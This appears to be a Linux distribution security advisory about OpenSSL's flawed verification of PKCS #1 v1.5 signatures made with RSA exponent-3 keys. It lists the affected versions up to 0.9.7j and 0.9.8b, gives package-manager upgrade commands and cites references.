1.  Synopsis
============
An attack on openssl(1)'s implementation of PKCS #1 v1.5 signatures.

2.  Background
==============
The OpenSSL Project is a collaborative effort to develop a robust,
commercial-grade, full-featured, and Open Source toolkit implementing 
the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security 
(TLS v1) protocols as well as a full-strength general purpose 
cryptography library.

3.  Description
===============
If an RSA key with exponent 3 is used it may be possible to forge 
a PKCS #1 v1.5 signature signed by that key. Implementations may 
incorrectly verify the certificate if they are not checking for
excess data in the RSA exponentiation result of the signature.

4.  Impact
==========
Since there are CAs using exponent 3 in wide use, and PKCS #1 v1.5 is
used in X.509 certificates, all software that uses OpenSSL to verify
X.509 certificates is potentially vulnerable, as well as any other use
of PKCS #1 v1.5. This includes software that uses OpenSSL for SSL or
TLS.

OpenSSL versions up to 0.9.7j and 0.9.8b are affected.

5.  Affected Packages
=====================
openssl

6. Resolution
=============
Update openssl as soon as possible
All openssl users should upgrade to the latest available version:
        # scribe update
        # cast -c openssl

or

        # scribe update
        # sorcery queue-security
        # cast --queue

7.  References
==============
[1] http://www.openssl.org/news/secadv_20060905.txt
[2] http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html
[3] http://bugs.sourcemage.org/show_bug.cgi?id=13081